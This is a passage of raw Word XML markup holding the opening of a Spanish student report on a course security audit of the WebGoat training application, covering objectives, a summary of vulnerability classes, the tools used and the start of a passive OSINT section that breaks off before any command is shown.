          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Conclusión</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D14081" w14:textId="77777777" w:rsidR="009022FF" w:rsidRPr="009022FF" w:rsidRDefault="009022FF" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38E6B306" w14:textId="098BDE22" w:rsidR="009022FF" w:rsidRDefault="009022FF" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Referencias</w:t>
      </w:r>
      <w:r w:rsidR="003617F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003617F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Bibliografia</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="056EB2A4" w14:textId="1227100D" w:rsidR="009022FF" w:rsidRDefault="009022FF" w:rsidP="003563E4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F9F6C87" w14:textId="77777777" w:rsidR="00717B6F" w:rsidRPr="00717B6F" w:rsidRDefault="00717B6F" w:rsidP="003563E4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01D519E5" w14:textId="1CF2916E" w:rsidR="009022FF" w:rsidRDefault="009022FF" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EC11C01" w14:textId="77777777" w:rsidR="009022FF" w:rsidRDefault="009022FF" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69AC664E" w14:textId="1835580F" w:rsidR="009022FF" w:rsidRPr="00717B6F" w:rsidRDefault="009022FF" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00717B6F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">INTRODUCCIÓN </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2A6EFA" w14:textId="6DA2F8B2" w:rsidR="00A6420D" w:rsidRDefault="00A6420D" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D5F4C06" w14:textId="77777777" w:rsidR="00A6420D" w:rsidRDefault="00A6420D" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">En el módulo de introducción a la ciberseguridad, aprendimos los fundamentos sobre los conceptos, principios y practicas esenciales para identificar y mitigar vulnerabilidades en sistemas y entornos digitales cada vez más expuestos a riesgos, entendiendo su impacto en la seguridad y confianza del entorno tecnológico actual. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E8BB1C" w14:textId="77777777" w:rsidR="00A6420D" w:rsidRDefault="00A6420D" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="202BB6EF" w14:textId="0788C49F" w:rsidR="00A6420D" w:rsidRPr="00A6420D" w:rsidRDefault="00A6420D" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Este informe se enfoca en la auditoria de la aplicación WebGoat, una plataforma educativa diseñada para demostrar vulnerabilidades comunes de seguridad en aplicaciones web. Este análisis permite aplicar los conocimientos adquiridos de manera práctica, desarrollando una comprensión </w:t>
      </w:r>
      <w:r w:rsidR="004D766B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>más</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> profunda de las amenazas que enfrentan a diario las organizaciones y algunas estrategias para abórdalas.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A43C7C" w14:textId="1C26516A" w:rsidR="009022FF" w:rsidRDefault="009022FF" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="050E0FE0" w14:textId="5D149EBD" w:rsidR="009022FF" w:rsidRDefault="009022FF" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Objetivos de la revisión</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F6BB08" w14:textId="7B4F79F2" w:rsidR="00A6420D" w:rsidRDefault="00A6420D" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33062184" w14:textId="2B0AD4F7" w:rsidR="00A6420D" w:rsidRDefault="00A6420D" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Identificar las vulnerabilidades de WebGoat simulando escenarios reales de ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5998BF07" w14:textId="11077E49" w:rsidR="00A6420D" w:rsidRDefault="00207D4B" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Aplicar los conceptos teóricos de los módulos de introducción a la ciberseguridad y ciberseguridad101, comprendiendo como las fallas pueden comprometer la seguridad de las aplicaciones web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CADC62" w14:textId="240B12C0" w:rsidR="00207D4B" w:rsidRDefault="00207D4B" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Evaluar el impacto de estas vulnerabilidades y buscar estrategias de mitigación que funcionen y sean efectivas en sistemas reales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DB0B04" w14:textId="5E842611" w:rsidR="00207D4B" w:rsidRDefault="00207D4B" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Mejorar la capacidad de análisis y lógica para detectar patrones comunes o errores de seguridad en aplicaciones modernas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB532F8" w14:textId="50B9DA79" w:rsidR="00207D4B" w:rsidRDefault="00207D4B" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04FF38E4" w14:textId="2D5F85D5" w:rsidR="00207D4B" w:rsidRDefault="00207D4B" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Resumen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449DFC25" w14:textId="2F7FCE2B" w:rsidR="00207D4B" w:rsidRDefault="00207D4B" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C830A43" w14:textId="01C24F39" w:rsidR="009022FF" w:rsidRDefault="002F6D72" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Durante la auditoria de WebGoat, se examinaron diferentes módulos y ejercicios enfocados en vulnerabilidades como SQL in</w:t>
      </w:r>
      <w:r w:rsidR="00A3117B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ec</w:t>
      </w:r>
      <w:r w:rsidR="00A3117B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00A3117B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>n, control de acceso insuficiente y exposición de datos sensibles. A través de metodologías investigadas y aprendidas, se logró identificar las principales áreas de riesgo y se documentaron los pasos realizados para asi mitigar dichas fallas. Este informe representa un paso significativo en la consolidación del aprendizaje practico, destacando la importancia de los conocimientos teóricos para la identificación y remediación de vulnerabilidades en el mundo actual.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F41A430" w14:textId="644484AD" w:rsidR="00AE237A" w:rsidRDefault="00AE237A" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33A2C660" w14:textId="06A12F70" w:rsidR="00AE237A" w:rsidRDefault="00AE237A" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70A59801" w14:textId="1BC540AC" w:rsidR="00AE237A" w:rsidRDefault="00AE237A" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="794EC5F2" w14:textId="39857BC4" w:rsidR="00AE237A" w:rsidRPr="00AE237A" w:rsidRDefault="00AE237A" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>METODOLOGIA DE ANALISIS (INFORMATION GATHERING)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E9F022" w14:textId="56268BF2" w:rsidR="00AE237A" w:rsidRDefault="00AE237A" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FD3ABE4" w14:textId="04E4E908" w:rsidR="00AE237A" w:rsidRDefault="00C46D42" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">El análisis se </w:t>
      </w:r>
      <w:r w:rsidR="004D766B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>llevó</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> acabo utilizando un enfoque mixto basándonos en la recolección de información para determinar posibles puntos débiles, combinando técnicas manuales y herramientas automatizadas. Las herramientas principales utilizadas fueron OWAS ZAP, Burp Suite, Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B04E585" w14:textId="45E5FCFA" w:rsidR="00C6496F" w:rsidRDefault="00C6496F" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2326DE9C" w14:textId="2536CDB5" w:rsidR="00C6496F" w:rsidRDefault="00C6496F" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="427E53B9" w14:textId="035EB82D" w:rsidR="00C6496F" w:rsidRDefault="00C6496F" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63CC5343" w14:textId="666AB0F7" w:rsidR="00C6496F" w:rsidRDefault="00C6496F" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Hallazgos pasivos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2613ED44" w14:textId="4CB16C9A" w:rsidR="00C6496F" w:rsidRDefault="00C6496F" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DA0230A" w14:textId="2D6DE763" w:rsidR="00C6496F" w:rsidRDefault="0031641F" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">En esta sección se documentan los hallazgos obtenidos mediante técnicas de recolección de información pasiva enfocada en el entorno de WebGoat. El objetivo fue identificar información </w:t>
      </w:r>
      <w:r w:rsidR="004D766B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>pública</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y metadatos relacionados sin interactuar con ella directamente. Esto nos permite explotar posibles focos de ataque o configuraciones expuestas de una manera más discreta, utilizando únicamente fuentes abiertas y herramientas no intrusivas. A continuación, adjunto los hallazgos y la evidencia recopilada mediante técnicas de OSINT (Open Soucurse Intelligence) y consultas a recursos públicos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77568337" w14:textId="6B4A8AB0" w:rsidR="0031641F" w:rsidRDefault="0031641F" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B7703C" w14:textId="60F02D60" w:rsidR="00C1653A" w:rsidRDefault="00C1653A" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Se realiza el comando </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1124">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
